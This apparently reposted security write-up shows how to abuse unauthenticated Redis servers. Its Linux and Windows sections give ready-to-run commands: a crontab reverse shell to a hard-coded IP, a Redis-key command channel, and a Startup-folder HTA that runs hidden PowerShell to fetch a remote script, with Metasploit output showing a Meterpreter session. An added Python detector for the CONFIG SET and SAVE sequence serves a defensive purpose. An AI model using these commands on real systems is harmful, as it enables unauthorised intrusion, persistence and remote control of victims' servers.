Linux exploitation (reposted from wooyun)
Redis exploitation does not need flushall to wipe the data at all: `redis-cli set 1 'ringzero'` lets you control the first record, which guarantees that your content always stays at the very front;
Test environment: CentOS, RHEL
# reverse shell via crontab
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
# create the file /tmp/888 via crontab
redis-cli flushall   # for convenience during testing
redis-cli set test 'test'
redis-cli set my 'mymymymymymymymymymymymy'
redis-cli set word 'wordwordwordwordwordword'
redis-cli set hello 'ringzero'
redis-cli set word1 'word1word1word1word1word1word1'
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save

redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
# rewrite the crontab a second time
redis-cli flushall
redis-cli set 2 ';a=`redis-cli get c`;'
redis-cli set 1 'id;redis-cli set r `$a`;#'
redis-cli config set dir /tmp/
redis-cli config set dbfilename w
redis-cli save
redis-cli set c whoami
# using the crontab-writing step from the first part, run the following commands
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
/bin/sh /tmp/zz
redis-cli get r
Controls /var/spool/cron/root and /tmp/zz
# end result: every 10 seconds the command to run is read from redis key c, and its output is written back into key r
* * * * * sleep 10;/bin/sh /tmp/zz
Windows exploitation (reposted from 90sec)
Redis has no official Windows release, but redis/win builds exist in the wild.
During a test I came across a Windows build of redis, so I started poking at it.
Straight to the exploit, based on msf:
root@xxx:~# cat hta-psh.txt
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
:~# cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK
Some strings in hta-psh.txt are altered; without this, characters are lost when the string is written.
#msfconsole
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#then start a handler, omitted
Edit 1.ps1; its content is roughly as follows:
$command="powershell -nop -w hidden -e xxxxxxxxxxxxxxxx";iex $command;$command2="taskkill /im mshta.exe";iex $command2;
Finally write the file and wait for an administrator to log in.
root@xxx:~# redis-cli -h 192.168.138.27
redis 192.168.138.27:6379> CONFIG GET dir
1) "dir"
2) "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
redis 192.168.138.27:6379> config get dbfilename
1) "dbfilename"
2) "2.hta"
redis 192.168.138.27:6379> save
OK
redis 192.168.138.27:6379>
msf exploit(handler) > rexploit -j -z
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse TCP handler on x.x.x.x:80
msf exploit(handler) > [*] Starting the payload handler...
[*] Sending stage (957999 bytes) to x.x.x.x
[*] Meterpreter session 4 opened (x.x.x.x:80 -> x.x.x.x:56301) at 2016-06-06 11:06:00 -0400
[*] Session ID 4 (x.x.x.x:80 -> x.x.x.x:56301) processing AutoRunScript 'migrate -f'
[*] Current server process: powershell.exe (4896)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3768
[+] Successfully migrated to process
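Both sections above rely on the same server-side sequence: CONFIG SET dir to a directory something else executes from (the cron spool, the Windows Startup folder), CONFIG SET dbfilename, then SAVE. The detector below, an added example that is not part of either reposted write-up, runs that logic over redis-cli MONITOR-style lines and keeps state per client; the sample lines, addresses and SENSITIVE_DIRS list are constructed for the example.

```python
import re
import shlex

# Dirs whose files something else executes or trusts; an RDB dump landing there is the write-up's technique.
SENSITIVE_DIRS = (
    "/var/spool/cron", "/etc/cron", "/.ssh", "/var/www",
    "start menu\\programs\\startup",
)
# redis-cli MONITOR line shape: <timestamp> [<db> <client>] "CMD" "arg" ...
_LINE = re.compile(r"^\+?(\S+) \[(\d+) ([^\]]+)\] (.*)$")

def parse_monitor_line(line):
    """Split one MONITOR line into timestamp, client and argument list."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    ts, _db, client, rest = m.groups()
    return {"ts": ts, "client": client, "args": shlex.split(rest)}

def detect_rdb_write_abuse(lines):
    """Flag CONFIG SET dir/dbfilename followed by SAVE or BGSAVE, tracked per client."""
    state, alerts = {}, []
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args, st = ev["args"], state.setdefault(ev["client"], {})
        cmd = args[0].lower()
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
            key, val = args[2].lower(), args[3]
            if key in ("dir", "dbfilename"):
                st[key] = val  # remember where the next SAVE will land
            if key == "dir" and any(s in val.lower() for s in SENSITIVE_DIRS):
                alerts.append(f"{ev['ts']} {ev['client']}: CONFIG SET dir to sensitive path {val!r}")
        elif cmd in ("save", "bgsave") and "dir" in st:
            target = st["dir"].rstrip("/\\") + "/" + st.get("dbfilename", "dump.rdb")
            alerts.append(f"{ev['ts']} {ev['client']}: {cmd.upper()} after CONFIG SET dir, dump written to {target}")
    return alerts

# Constructed sample: one legitimate client interleaved with the crontab-write sequence from the Linux section.
SAMPLE_MONITOR = """\
1465225560.100001 [0 10.0.0.5:41022] "GET" "session:42"
1465225561.000002 [0 203.0.113.9:53110] "FLUSHALL"
1465225561.000203 [0 203.0.113.9:53110] "SET" "1" "*/1 * * * * /bin/touch /tmp/888"
1465225561.000404 [0 203.0.113.9:53110] "CONFIG" "SET" "dir" "/var/spool/cron/"
1465225561.000605 [0 203.0.113.9:53110] "CONFIG" "SET" "dbfilename" "root"
1465225561.000806 [0 203.0.113.9:53110] "SAVE"
1465225562.000001 [0 10.0.0.5:41022] "SET" "session:42" "ok"
""".splitlines()
```

`detect_rdb_write_abuse(SAMPLE_MONITOR)` returns two alerts for the 203.0.113.9 client (the sensitive dir, then the SAVE that drops /var/spool/cron/root) and nothing for the 10.0.0.5 traffic; the same CONFIG commands never appear in a deployment that has renamed or disabled CONFIG, which is the usual hardening for this class of abuse.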
Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching; readers who use this information for any other purpose bear all legal and joint liability, and this site bears none. For questions, contact us by email (use a corporate or otherwise valid mailbox so the mail is not intercepted; contact details are on the home page).